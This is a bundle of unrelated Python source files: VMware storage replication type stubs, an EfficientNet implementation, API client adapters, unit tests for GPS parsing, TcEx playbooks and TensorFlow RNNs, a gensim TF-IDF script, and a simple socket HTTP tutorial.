state = ""
devices = [ sms.storage.replication.TargetGroupMemberInfo() ]
isPromoteCapable = False
class TargetToSourceInfo(vmodl.DynamicData): # sms.storage.replication.TargetGroupInfo.TargetToSourceInfo
sourceGroupId = vim.vm.replication.ReplicationGroupId()
replicationAgreementDescription = ""
class TargetGroupMemberInfo(vmodl.DynamicData): # sms.storage.replication.TargetGroupMemberInfo
replicaId = sms.storage.replication.ReplicaId()
sourceId = sms.storage.replication.DeviceId()
targetDatastore = vim.Datastore()
class TestFailoverParam(sms.storage.replication.FailoverParam): # sms.storage.replication.TestFailoverParam
pass
class VVolId(sms.storage.replication.DeviceId): # sms.storage.replication.VVolId
id = ""
class VirtualDiskId(sms.storage.replication.DeviceId): # sms.storage.replication.VirtualDiskId
diskId = ""
class VirtualDiskKey(sms.storage.replication.DeviceId): # sms.storage.replication.VirtualDiskKey
vmInstanceUUID = ""
deviceKey = 0
class VirtualDiskMoId(sms.storage.replication.DeviceId): # sms.storage.replication.VirtualDiskMoId
vcUuid = ""
vmMoid = ""
diskKey = ""
class VirtualMachineId(sms.storage.replication.DeviceId): # sms.storage.replication.VirtualMachineId
pass
class VirtualMachineMoId(sms.storage.replication.VirtualMachineId): # sms.storage.replication.VirtualMachineMoId
vcUuid = ""
vmMoid = ""
class VirtualMachineUUID(sms.storage.replication.VirtualMachineId): # sms.storage.replication.VirtualMachineUUID
vmInstanceUUID = ""
class FailoverSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.FailoverSuccessResult
newState = ""
pitId = sms.storage.replication.PointInTimeReplicaId()
pitIdBeforeFailover = sms.storage.replication.PointInTimeReplicaId()
recoveredDeviceInfo = [ sms.storage.replication.FailoverSuccessResult.RecoveredDevice() ]
timeStamp = vmodl.DateTime()
class RecoveredDiskInfo(vmodl.DynamicData): # sms.storage.replication.FailoverSuccessResult.RecoveredDiskInfo
deviceKey = 0
dsUrl = ""
diskPath = ""
class RecoveredDevice(vmodl.DynamicData): # sms.storage.replication.FailoverSuccessResult.RecoveredDevice
targetDeviceId = sms.storage.replication.ReplicaId()
recoveredDeviceId = sms.storage.replication.DeviceId()
sourceDeviceId = sms.storage.replication.DeviceId()
info = [ "" ]
datastore = vim.Datastore()
recoveredDiskInfo = [ sms.storage.replication.FailoverSuccessResult.RecoveredDiskInfo() ]
error = vmodl.MethodFault()
warnings = [ vmodl.MethodFault() ]
class GroupErrorResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.GroupErrorResult
error = [ vmodl.MethodFault() ]
class RecoveredTargetGroupMemberInfo(sms.storage.replication.TargetGroupMemberInfo): # sms.storage.replication.RecoveredTargetGroupMemberInfo
recoveredDeviceId = sms.storage.replication.DeviceId()
class VirtualMachineFilePath(sms.storage.replication.VirtualMachineId): # sms.storage.replication.VirtualMachineFilePath
vcUuid = ""
dsUrl = ""
vmxPath = ""
class FcStoragePort(sms.storage.StoragePort): # sms.storage.FcStoragePort
portWwn = ""
nodeWwn = ""
class FcoeStoragePort(sms.storage.StoragePort): # sms.storage.FcoeStoragePort
portWwn = ""
nodeWwn = ""
class IscsiStoragePort(sms.storage.StoragePort): # sms.storage.IscsiStoragePort
identifier = ""
|
import math
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Input, Dense, Conv2D, DepthwiseConv2D, BatchNormalization, Dropout, GlobalAveragePooling2D, Reshape, multiply, add, Activation
from skimage.transform import resize
CONV_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 2.0,
'mode': 'fan_out',
'distribution': 'normal'
}
}
DENSE_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 1. / 3.,
'mode': 'fan_out',
'distribution': 'uniform'
}
}
def SqueezeExcitation(x, filters_in, filters_expand, se_ratio):
filters_se = max(1, int(filters_in * se_ratio))
# Squeeze.
se = GlobalAveragePooling2D()(x)
se = Reshape((1, 1, filters_expand))(se)
# Excitation.
se = Conv2D(filters=filters_se,
kernel_size=1,
padding='same',
kernel_initializer= CONV_KERNEL_INITIALIZER,
use_bias=True)(se)
se = Activation(tf.nn.swish)(se)
se = Conv2D(filters=filters_expand,
kernel_size=1,
padding='same',
activation='sigmoid',
kernel_initializer= CONV_KERNEL_INITIALIZER,
use_bias=True)(se)
# Scale.
x = multiply([x, se])
return x
def __bottleneck(inputs, filters_in, filters_out, kernel_size, expansion_coef, se_ratio, stride, dropout_rate):
# Dimension of the output space after expansion.
filters_expand = filters_in * expansion_coef
# Expansion phase.
if expansion_coef != 1:
x = Conv2D(filters=filters_expand,
kernel_size=1,
strides=1,
padding='same',
kernel_initializer=CONV_KERNEL_INITIALIZER,
use_bias=False)(inputs)
x = BatchNormalization()(x)
x = Activation(tf.nn.swish)(x)
else:
x = inputs
#Dephtwise conv phase.
x = DepthwiseConv2D(kernel_size=kernel_size,
strides=stride,
padding='same',
depthwise_initializer=CONV_KERNEL_INITIALIZER,
use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation(tf.nn.swish)(x)
#Squeeze and Excitation phase.
x = SqueezeExcitation(x, filters_in, filters_expand, se_ratio)
#Output phase.
x = Conv2D(filters=filters_out,
kernel_size=1,
padding='same',
kernel_initializer=CONV_KERNEL_INITIALIZER,
use_bias=False)(x)
x = BatchNormalization()(x)
if (stride == 1 and filters_in == filters_out):
if dropout_rate > 0:
x = Dropout(dropout_rate)(x)
x = add([x, inputs])
return x
def MBConvBlock(inputs, filters_in, filters_out, kernel_size, expansion_coef, se_ratio, stride, repeat, dropout_rate):
x = __bottleneck(inputs, filters_in, filters_out, kernel_size, expansion_coef, se_ratio, stride, dropout_rate)
filters_in = filters_out
stride = 1
for i in range(1, repeat):
x = __bottleneck(x, filters_in, filters_out, kernel_size, expansion_coef, se_ratio, stride, dropout_rate)
return x
def ConvBlock(inputs, filters, kernel_size, stride=1, padding='same'):
"""
"""
x = inputs
x = Conv2D(filters=filters,
kernel_size=kernel_size,
strides=stride,
padding=padding,
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER)(x)
x = BatchNormalization()(x)
x = Activation(tf.nn.swish)(x)
return x
def efficientnet_params(model_name):
params_dict = {
# Coefficients: width,depth,res,dropout
'efficientnet-b0': (1.0, 1.0, 224, 0.2),
'efficientnet-b1': (1.0, 1.1, 240, 0.2),
'efficientnet-b2': (1.1, 1.2, 260, 0.3),
'efficientnet-b3': (1.2, 1.4, 300, 0.3),
'efficientnet-b4': (1.4, 1.8, 380, 0.4),
'efficientnet-b5': (1.6, 2.2, 456, 0.4),
'efficientnet-b6': (1.8, 2.6, 528, 0.5),
'efficientnet-b7': (2.0, 3.1, 600, 0.5),
'efficientnet-b8': (2.2, 3.6, 672, 0.5),
'efficientnet-l2': (4.3, 5.3, 800, 0.5),
}
return params_dict[model_name]
def scaled_repeats(n, d_coef):
return int(math.ceil(n * d_coef))
def scaled_channels(n, w_coef):
n = n * w_coef
m = max(8, int(n + 8 / 2) // 8 * 8)
if m < 0.9 * n:
m = m + 8
return int(m)
def center_crop_and_resize(image, image_size, crop_padding=32, interpolation="bicubic"):
MAP_INTERPOLATION_TO_ORDER = {
"nearest": 0,
"bilinear": 1,
"biquadratic": 2,
"bicubic": 3,
}
assert image.ndim in {2, 3}
assert interpolation in MAP_INTERPOLATION_TO_ORDER.keys()
h, w = image.shape[:2]
padded_center_crop_size = int(
(image_size / (image_size + crop_padding)) * min(h, w)
)
offset_height = ((h - padded_center_crop_size) + 1) // 2
offset_width = ((w - padded_center_crop_size) + 1) // 2
image_crop = image[
offset_height: padded_center_crop_size + offset_height,
offset_width: padded_center_crop_size + offset_width,
]
resized_image = resize(
image_crop,
(image_size, image_size),
order=MAP_INTERPOLATION_TO_ORDER[interpolation],
preserve_range=True,
)
return resized_image |
from typing import Union
from urllib.parse import parse_qs
from hw.alexander_sidorov.common import Errors
from hw.alexander_sidorov.common import api
from hw.alexander_sidorov.common import typecheck
Data = dict[str, list[str]]
@api
@typecheck
def task_06(query: str) -> Union[Data, Errors]:
"""
Splits HTTP query into a dict.
"""
data = parse_qs(
query,
keep_blank_values=True,
)
return data
|
from __future__ import absolute_import, division, print_function
from stripe_modern.api_resources.abstract import CreateableAPIResource
from stripe_modern.api_resources.abstract import ListableAPIResource
from stripe_modern.api_resources.abstract import nested_resource_class_methods
@nested_resource_class_methods("line_item", operations=["list"])
class Session(CreateableAPIResource, ListableAPIResource):
OBJECT_NAME = "checkout.session"
|
"""Declare the Requests client interface and register it."""
import typing
import zope.interface
import zope.interface.verify
if typing.TYPE_CHECKING:
import requests
from . import interface
@zope.interface.implementer(interface.IRequest)
class Requests:
"""ClientAdapter used with the Requests library."""
def uri(
self: "Requests",
request: typing.Any,
) -> str:
"""Retrieve the URL of a PreparedRequest from Requests."""
request = typing.cast("requests.PreparedRequest", request)
return typing.cast("str", request.url)
|
"""Tests the gps module."""
import unittest
from mock import patch
import pynmea2
import pytest
import control.gps
# mock gps nmea 0183 messages
NMEA_MSG_GGA = "$GNGGA,183236.00,3311.64266,N,08730.77826,W,1,07,1.24,85.4,M,-29.8,M,,*4A"
NMEA_MSG_GGA2 = "$GNGGA,183235.00,3311.64268,N,08730.77830,W,1,07,1.24,85.5,M,-29.8,M,,*41"
NMEA_MSG_RMC = "$GNRMC,183235.00,A,3311.64268,N,08730.77830,W,0.169,,040318,,,A*7B"
NMEA_MSG_GSV = "$GPGSV,2,2,06,26,61,047,42,31,27,063,38*70"
NMEA_MSG_NOLOCK = "$GNGGA,,,,,,0,00,99.99,,,,,,*56"
NMEA_MSG_CORRUPT = "..,,,,99,,,,"
def expected_gps_reading(msg):
"""Helper function returns expected parsed nmea message as a GpsReading"""
parsed_msg = pynmea2.parse(msg)
return control.gps.GpsReading(parsed_msg.latitude,
parsed_msg.longitude,
parsed_msg.altitude,
parsed_msg.timestamp)
class GPStest(unittest.TestCase):
"""GPS module unit tests."""
def setUp(self):
self.patcher = patch('serial.Serial')
self.addCleanup(self.patcher.stop)
self.mock_serial_class = self.patcher.start()
self.mock_serial_connect = self.mock_serial_class.return_value
self.gps = control.gps.Gps("connection", 9600)
def test_gps_gga_msg_read(self):
"""Test reading a proper GGA message."""
self.mock_serial_connect.readline.return_value = NMEA_MSG_GGA
expected_reading = expected_gps_reading(NMEA_MSG_GGA)
actual_reading = self.gps.read()
self.assertEqual(actual_reading, expected_reading)
def test_gps_multiple_msg_types(self):
"""Test reading multiple nmea message types."""
msg_return_list = [NMEA_MSG_RMC, NMEA_MSG_GSV, NMEA_MSG_GGA2]
self.mock_serial_connect.readline.side_effect = msg_return_list
expected_reading = expected_gps_reading(NMEA_MSG_GGA2)
actual_reading = self.gps.read()
self.assertEqual(actual_reading, expected_reading)
def test_gps_satellite_no_lock_msg(self):
"""Test reading a nmea message with no satellite lock."""
msg_return_list = [NMEA_MSG_RMC, NMEA_MSG_NOLOCK, NMEA_MSG_GGA]
self.mock_serial_connect.readline.side_effect = msg_return_list
expected_reading = expected_gps_reading(NMEA_MSG_NOLOCK)
actual_reading = self.gps.read()
self.assertEqual(actual_reading, expected_reading)
def test_gps_corrupt_msg(self):
"""Test reading a corrupt nmea message."""
msg_return_list = [NMEA_MSG_CORRUPT, NMEA_MSG_CORRUPT, NMEA_MSG_CORRUPT, NMEA_MSG_GGA]
self.mock_serial_connect.readline.side_effect = msg_return_list
expected_reading = expected_gps_reading(NMEA_MSG_GGA)
actual_reading = self.gps.read()
self.assertEqual(actual_reading, expected_reading)
def test_gps_corrupt_msg2(self):
"""Test reading a corrupt nmea message mixed with other valid messages."""
msg_return_list = [NMEA_MSG_CORRUPT, NMEA_MSG_GSV,
NMEA_MSG_RMC, NMEA_MSG_GGA, NMEA_MSG_CORRUPT]
self.mock_serial_connect.readline.side_effect = msg_return_list
expected_reading = expected_gps_reading(NMEA_MSG_GGA)
actual_reading = self.gps.read()
self.assertEqual(actual_reading, expected_reading)
def test_gps_corrupt_msg3(self):
"""Test reading max number of corrupt nmea messages."""
with pytest.raises(control.gps.GpsReadError):
msg_return_list = [NMEA_MSG_CORRUPT, NMEA_MSG_CORRUPT,
NMEA_MSG_CORRUPT, NMEA_MSG_CORRUPT, NMEA_MSG_GGA]
self.mock_serial_connect.readline.side_effect = msg_return_list
self.gps.read()
def test_offset_and_locations_are_inverse_functions():
"""Tests that get_location_offset and get_relative_from_location are
inverse functions.
"""
origin = control.gps.GpsReading(33.142220, -87.582491, 0, 0)
offset = control.gps.get_location_offset(origin, 10, 15)
tup = control.gps.get_relative_from_location(origin, offset)
assert tup[0] - 15 < 1
assert tup[1] - 10 < 1
offset = control.gps.get_location_offset(origin, -7, -15)
tup = control.gps.get_relative_from_location(origin, offset)
assert tup[0] + 15 < 1
assert tup[1] + 7 < 1
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Models for PassManagerConfig and its related components."""
from qiskit.transpiler.models import PassManagerConfigSchema
from qiskit.validation import BaseModel, bind_schema
@bind_schema(PassManagerConfigSchema)
class PassManagerConfig(BaseModel):
"""Model for PassManagerConfig.
Please note that this class only describes the required fields. For the
full description of the model, please check ``PassManagerConfigSchema``.
Attributes:
initial_layout (Layout): Initial position of virtual qubits on physical qubits.
basis_gates (list): List of basis gate names to unroll to.
coupling_map (CouplingMap): Directed graph represented a coupling map.
backend_properties (BackendProperties): Properties returned by a backend, including
information on gate errors, readout errors, qubit coherence times, etc.
seed_transpiler (int): Sets random seed for the stochastic parts of the transpiler.
"""
def __init__(self,
initial_layout=None,
basis_gates=None,
coupling_map=None,
backend_properties=None,
seed_transpiler=None,
**kwargs):
super().__init__(initial_layout=initial_layout,
basis_gates=basis_gates,
coupling_map=coupling_map,
backend_properties=backend_properties,
seed_transpiler=seed_transpiler,
**kwargs)
|
import ConfigParser
class ConfigurationOptions(object):
"""
generic shell object for storing attributes
"""
pass
class ConfigurationParser(object):
def __init__(self,path=""):
self._options = {}
self._path = path
def set_path(self,path):
self._path = path
def add_option(self,dest,path,help=None,action="get",default=None,type="string"):
self._options[dest] = {
'path' : path,
'help' : help,
'action' : action,
'default' : default,
'type' : type,
}
def del_option(self,dest):
if dest in self._options:
del self._options[dest]
def parse_config(self):
options = ConfigurationOptions()
config = ConfigParser.ConfigParser(allow_no_value=True)
config.read(self._path)
for dest,details in self._options.items():
path = details['path']
actionfxn = getattr(config,details['action'])
try:
value = details['type'](actionfxn(*path))
except:
value = details['default']
setattr(options,dest,value)
return options
|
"""Test the TcEx Batch Module."""
# third-party
import pytest
# pylint: disable=no-self-use
class TestUtils:
"""Test the TcEx Batch Module."""
@pytest.mark.parametrize(
'variable,value',
[
('#App:0002:te1!TCEntity', {'id': '001', 'value': '1.1.1.1', 'type': 'Address'}),
('#App:0002:te2!TCEntity', {'id': '002', 'value': '2.2.2.2', 'type': 'Address'}),
('#App:0002:te3!TCEntity', {'id': '003', 'value': '3.3.3.3', 'type': 'Address'}),
('#App:0002:te4!TCEntity', {'id': '004', 'value': '3.3.3.3', 'type': 'Address'}),
],
)
def test_playbook_tc_entity(self, variable, value, tcex):
"""Test the string array method of Playbook module.
Args:
variable (str): The key/variable to create in Key Value Store.
value (str): The value to store in Key Value Store.
tcex (TcEx, fixture): An instantiated instance of TcEx object.
"""
tcex.playbook.create_tc_entity(variable, value)
result = tcex.playbook.read_tc_entity(variable)
assert result == value, f'result of ({result}) does not match ({value})'
tcex.playbook.delete(variable)
assert tcex.playbook.read(variable) is None
@pytest.mark.parametrize(
'variable,value',
[
('#App:0002:b1!TCEntity', {'one': '1', 'two': 'two'}),
('#App:0002:b2!TCEntity', []),
('#App:0002:b3!TCEntity', {}),
('#App:0002:b4!WrongType', 'wrong type'),
],
)
def test_playbook_tc_entity_fail(self, variable, value, tcex):
"""Test the string array method of Playbook module.
Args:
variable (str): The key/variable to create in Key Value Store.
value (str): The value to store in Key Value Store.
tcex (TcEx, fixture): An instantiated instance of TcEx object.
"""
try:
tcex.playbook.create_tc_entity(variable, value)
assert False, f'{value} is not a valid Binary value'
except RuntimeError:
assert True
@pytest.mark.parametrize(
'variable,value',
[
(
'#App:0002:tea1!TCEntityArray',
[
{'id': '001', 'value': '1.1.1.1', 'type': 'Address'},
{'id': '011', 'value': '11.11.11.11', 'type': 'Address'},
],
),
(
'#App:0002:tea2!TCEntityArray',
[
{'id': '002', 'value': '2.2.2.2', 'type': 'Address'},
{'id': '022', 'value': '22.22.22.22', 'type': 'Address'},
],
),
(
'#App:0002:tea3!TCEntityArray',
[
{'id': '003', 'value': '3.3.3.3', 'type': 'Address'},
{'id': '033', 'value': '33.33.33.33', 'type': 'Address'},
],
),
(
'#App:0002:tea4!TCEntityArray',
[
{'id': '004', 'value': '4.4.4.4', 'type': 'Address'},
{'id': '044', 'value': '44.44.44.44', 'type': 'Address'},
],
),
],
)
def test_playbook_tc_entity_array(self, variable, value, tcex):
"""Test the string array method of Playbook module.
Args:
variable (str): The key/variable to create in Key Value Store.
value (str): The value to store in Key Value Store.
tcex (TcEx, fixture): An instantiated instance of TcEx object.
"""
tcex.playbook.create_tc_entity_array(variable, value)
result = tcex.playbook.read_tc_entity_array(variable)
assert result == value, f'result of ({result}) does not match ({value})'
tcex.playbook.delete(variable)
assert tcex.playbook.read(variable) is None
@pytest.mark.parametrize(
'variable,value',
[
(
'#App:0003:tea1!TCEntityArray',
[
{'id': '001', 'value': '1.1.1.1', 'type': 'Address'},
{'id': '011', 'ip': '11.11.11.11', 'type': 'Address'},
],
),
('#App:0003:tea2!TCEntityArray', 'not a TCEntityArray'),
('#App:0003:tea3!WrongType', 'wrong type'),
],
)
def test_playbook_tc_entity_array_fail(self, variable, value, tcex):
"""Test the string array method of Playbook module.
Args:
variable (str): The key/variable to create in Key Value Store.
value (str): The value to store in Key Value Store.
tcex (TcEx, fixture): An instantiated instance of TcEx object.
"""
try:
tcex.playbook.create_tc_entity_array(variable, value)
assert False, f'{value} is not a valid Binary Array value'
except RuntimeError:
assert True
|
# # -*- coding: utf-8 -*-
# """
# models.planning
# ~~~~~~~~~~~~~~~
# Planning specific models. This might get re-named or simply re-ordered.
# TODO: Work out what these are
# """
# # 3rd Party
# import sqlalchemy as sa
# # Module
# from .core import BaseModel
# class MaxAnnualOperationalThroughput(BaseModel):
# volume_unit = sa.Column(Unicode(255))
# class InertLandfill(BaseModel):
# total_void_capacity =''
# max_annual_operational_throughput = sa.Column(
# sa.Integer, sa.ForeignKey('max_annual_operational_throughput.id'))
|
import json
from chalice.app import SQSEvent
from chalice.app import SQSRecord
from tests.unit.helpers.aws.sqs_helper import get_sqs_event_stub, get_sqs_message_stub
def create_chalice_sqs_record(event_dict, context=None):
event = event_dict
if event_dict[0]:
event = event_dict[0]
else:
if not 'body' in event_dict and not 'messageId' in event_dict:
event = get_sqs_event_stub()
event['body'] = event_dict
sqs_record = SQSRecord(event, context)
return sqs_record
def create_chalice_sqs_event(event_dict, context=None):
sqs_event = event_dict
if 'Records' not in event_dict:
sqs_message_stub = get_sqs_message_stub()
sqs_message_stub['body'] = json.dumps(event_dict)
sqs_event = get_sqs_event_stub()
records = sqs_event['Records']
records.append(sqs_message_stub)
return SQSEvent(sqs_event, context)
|
import pygame, easygui, sys
import constants
pygame.init()
try:
centerFontObj = pygame.font.Font("resources/font.ttf", 32)
except pygame.error:
easygui.msgbox("font.ttf doesn't exist.")
pygame.quit()
sys.exit()
fontObj = pygame.font.Font("resources/font.ttf", 16)
class centerText:
def __init__(self, text):
self.text = centerFontObj.render(text, True, constants.WHITE)
self.rect = self.text.get_rect()
self.rect.center = (constants.SCREEN_WIDTH/2, constants.SCREEN_HEIGHT/2)
def __str__(self):
return self.text
class ScoreText:
def __init__(self):
self.text = fontObj.render("", True, constants.WHITE)
self.rect = self.text.get_rect()
self.rect.x = 0
self.rect.y = 0
def update(self, score1, score2, time):
#self.text = fontObj.render("Tank 1 Score: " + str(score1) + " | Tank 2 Score: " + str(score2) + " | Time: " + str(time), True, constants.WHITE, constants.BLACK)
self.text = fontObj.render("Score: " + str(score1) + "-" + str(score2) + " Time: " + str(time), True, constants.WHITE, constants.BLACK)
def splashText(text):
screen = pygame.display.get_surface()
displayText = centerText(text)
screen.blit(displayText.text, displayText.rect) |
import socket
myso = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
myso.connect(('www.py4inf.com', 80))
myso.send('GET http://www.py4inf.com/code/romeo.txt HTTP/1.0\n\n')
while True:
data = myso.recv(512)
if(len(data)<1):
break
print data
myso.close()
|
# импортируем специальные поля Алхимии для инициализации полей таблицы
from sqlalchemy import Column, Boolean, Integer, ForeignKey
# импортируем модуль для связки таблиц
from sqlalchemy.orm import relationship, backref
# импортируем модуль инициализации декларативного класса Алхимии
from DB.dbcore import Base
# импортируем модель продуктов для связки моделей
from models.product import Products
from models.order_info import OrderInfo
class Order(Base):
"""
Класс Orders, основан на декларативном стиле sqlalchemy, нужен для оформления заказов
"""
# Инициализация полей таблицы
__tablename__ = 'orders'
id = Column(Integer, primary_key=True)
is_current = Column(Boolean)
order_id = Column(Integer, ForeignKey('order_info.id'))
product_id = Column(Integer, ForeignKey('products.id'))
quantity = Column(Integer)
# используется cascade='delete,all' для каскадного удаления данных ис таблицы
orders = relationship(
OrderInfo,
backref=backref('orders',
uselist=True,
cascade='delete,all'))
products = relationship(
Products,
backref=backref('orders',
uselist=True,
cascade='delete,all'))
def __init__(self, is_current, order_id, product_id, quantity):
self.is_current = is_current
self.order_id = order_id
self.product_id = product_id
self.quantity = quantity
def __repr__(self):
"""
Метод возвращает формальное строковое представление указанного объекта
"""
return "Order: {}".format(self.order_id) |
# coding:utf8
"""
Description:实战案例5:Gensim实现新闻文本特征向量化
Author:伏草惟存
Prompt: code in Python3 env
"""
import os,time,sys
from mydict import *
from StopWords import *
from gensim import corpora, models
#******************** 高效读取文件***********************************
class loadFolders(object): # 迭代器
def __init__(self, par_path):
self.par_path = par_path
def __iter__(self):
for file in os.listdir(self.par_path):
file_abspath = os.path.join(self.par_path, file)
if os.path.isdir(file_abspath): # if file is a folder
yield file_abspath
class loadFiles(object):
def __init__(self, par_path):
self.par_path = par_path
def __iter__(self):
folders = loadFolders(self.par_path)
for folder in folders: # level directory
catg = folder.split(os.sep)[-1]
for file in os.listdir(folder): # secondary directory
file_path = os.path.join(folder, file)
if os.path.isfile(file_path):
this_file = open(file_path, 'rb') #rb读取方式更快
content = this_file.read().decode('utf8')
yield catg, content
this_file.close()
if __name__=='__main__':
start = time.time()
n = 5 # n 表示抽样率, n抽1
path_doc_root = '../dataSet/CSCMNews' # 根目录 即存放按类分类好的文本数据集
path_tmp = '../dataSet/files/CSCMNews_model' # 存放中间结果的位置
path_dictionary = os.path.join(path_tmp, 'CSCMNews.dict') # 存放词典
path_tmp_tfidf = os.path.join(path_tmp, 'tfidf_corpus') # 存放tfidf
if not os.path.exists(path_tmp):
os.makedirs(path_tmp)
# ===================================================================
# 第一阶段,遍历文档,生成词典,并去掉频率较少的项
# 如果指定的位置没有词典,则重新生成一个。如果有,则跳过该阶段
if not os.path.exists(path_dictionary):
print('=== 未检测到有词典存在,开始遍历生成词典 ===')
dictionary = corpora.Dictionary()
files = loadFiles(path_doc_root)
for i, msg in enumerate(files):
if i % n == 0:
catg = msg[0]
content = msg[1]
content = seg_doc(content)
dictionary.add_documents([content])
if int(i/n) % 1000 == 0:
print('{t} *** {i} \t docs has been dealed'
.format(i=i, t=time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())))
# 去掉词典中出现次数过少的
small_freq_ids = [tokenid for tokenid, docfreq in dictionary.dfs.items() if docfreq < 5 ]
dictionary.filter_tokens(small_freq_ids)
dictionary.compactify() # 从新产生连续的编号
dictionary.save(path_dictionary)
print('=== 词典已经生成 ===')
else:
print('=== 检测到词典已经存在,跳过该阶段 ===')
# ===================================================================
# 第二阶段, 开始将文档转化成tfidf
dictionary = None
if not os.path.exists(path_tmp_tfidf):
print('=== 未检测到有tfidf文件夹存在,开始生成tfidf向量 ===')
# 如果指定的位置没有tfidf文档,则生成一个。如果有,则跳过该阶段
if not dictionary: # 如果跳过了第一阶段,则从指定位置读取词典
dictionary = corpora.Dictionary.load(path_dictionary)
os.makedirs(path_tmp_tfidf)
files = loadFiles(path_doc_root)
tfidf_model = models.TfidfModel(dictionary=dictionary)
corpus_tfidf = {}
for i, msg in enumerate(files):
if i % n == 0:
catg = msg[0]
content = msg[1]
word_list = seg_doc(content)
file_bow = dictionary.doc2bow(word_list)
file_tfidf = tfidf_model[file_bow]
tmp = corpus_tfidf.get(catg, [])
tmp.append(file_tfidf)
if tmp.__len__() == 1:
corpus_tfidf[catg] = tmp
if i % 10000 == 0:
print('{i} files is dealed'.format(i=i))
# 将tfidf中间结果储存起来
catgs = list(corpus_tfidf.keys())
for catg in catgs:
corpora.MmCorpus.serialize('{f}{s}{c}.mm'.format(f=path_tmp_tfidf, s=os.sep, c=catg),corpus_tfidf.get(catg),id2word=dictionary)
print('catg {c} has been transformed into tfidf vector'.format(c=catg))
print('=== tfidf向量已经生成 ===')
else:
print('=== 检测到tfidf向量已经生成,跳过该阶段 ===')
end = time.time()
print('total spent times:%.2f' % (end-start)+ ' s')
|
from factory import *
if __name__ == "__main__":
CONNECT = DatabaseFactory.get_database('tsql').instance().connect()
EXECUTE = DatabaseFactory.get_database('tsql').instance().execute()
DISSCONECT = DatabaseFactory.get_database('tsql').instance().disconnect()
print(CONNECT)
print(EXECUTE)
print(DISSCONECT)
|
from rest_framework import serializers
from .models import AssetInfo
class AssetSerializer(serializers.ModelSerializer):
class Meta:
model = AssetInfo
fields = '__all__'
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for rnn module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import time
import timeit
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.python.util import nest
class Plus1RNNCell(tf.contrib.rnn.RNNCell):
"""RNN Cell generating (output, new_state) = (input + 1, state + 1)."""
@property
def output_size(self):
return 5
@property
def state_size(self):
return 5
def __call__(self, input_, state, scope=None):
return (input_ + 1, state + 1)
class DummyMultiDimensionalLSTM(tf.contrib.rnn.RNNCell):
"""LSTM Cell generating (output, new_state) = (input + 1, state + 1).
The input to this cell may have an arbitrary number of dimensions that follow
the preceding 'Time' and 'Batch' dimensions.
"""
def __init__(self, dims):
"""Initialize the Multi-dimensional LSTM cell.
Args:
dims: tuple that contains the dimensions of the output of the cell,
without including 'Time' or 'Batch' dimensions.
"""
if not isinstance(dims, tuple):
raise TypeError("The dimensions passed to DummyMultiDimensionalLSTM"
"should be a tuple of ints.")
self._dims = dims
self._output_size = tf.TensorShape(self._dims)
self._state_size = (tf.TensorShape(self._dims), tf.TensorShape(self._dims))
@property
def output_size(self):
return self._output_size
@property
def state_size(self):
return self._state_size
def __call__(self, input_, state, scope=None):
h, c = state
return (input_ + 1, (h + 1, c + 1))
class NestedRNNCell(tf.contrib.rnn.RNNCell):
"""RNN Cell generating (output, new_state) = (input + 1, state + 1).
The input, output and state of this cell is a tuple of two tensors.
"""
@property
def output_size(self):
return (5, 5)
@property
def state_size(self):
return (6, 6)
def __call__(self, input_, state, scope=None):
h, c = state
x, y = input_
return ((x + 1, y + 1), (h + 1, c + 1))
class TestStateSaver(object):
def __init__(self, batch_size, state_size):
self._batch_size = batch_size
self._state_size = state_size
self.saved_state = {}
def state(self, name):
if isinstance(self._state_size, dict):
state_size = self._state_size[name]
else:
state_size = self._state_size
if isinstance(state_size, int):
state_size = (state_size,)
elif isinstance(state_size, tuple):
pass
else:
raise TypeError("state_size should either be an int or a tuple")
return tf.zeros((self._batch_size,) + state_size)
def save_state(self, name, state):
self.saved_state[name] = state
return tf.identity(state)
class RNNTest(tf.test.TestCase):
def setUp(self):
self._seed = 23489
np.random.seed(self._seed)
def testInvalidSequenceLengthShape(self):
cell = Plus1RNNCell()
inputs = [tf.placeholder(tf.float32, shape=(3, 4))]
with self.assertRaisesRegexp(ValueError, "must be a vector"):
tf.nn.dynamic_rnn(
cell, tf.stack(inputs), dtype=tf.float32, sequence_length=[[4]])
class GRUTest(tf.test.TestCase):
def setUp(self):
self._seed = 23489
np.random.seed(self._seed)
def _testDynamic(self, use_gpu):
time_steps = 8
num_units = 3
input_size = 5
batch_size = 2
input_values = np.random.randn(time_steps, batch_size, input_size)
sequence_length = np.random.randint(0, time_steps, size=batch_size)
with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
concat_inputs = tf.placeholder(
tf.float32, shape=(time_steps, batch_size, input_size))
cell = tf.contrib.rnn.GRUCell(num_units=num_units)
with tf.variable_scope("dynamic_scope"):
outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
cell, inputs=concat_inputs, sequence_length=sequence_length,
time_major=True, dtype=tf.float32)
feeds = {concat_inputs: input_values}
# Initialize
tf.global_variables_initializer().run(feed_dict=feeds)
sess.run([outputs_dynamic, state_dynamic], feed_dict=feeds)
def testDynamic(self):
self._testDynamic(use_gpu=False)
self._testDynamic(use_gpu=True)
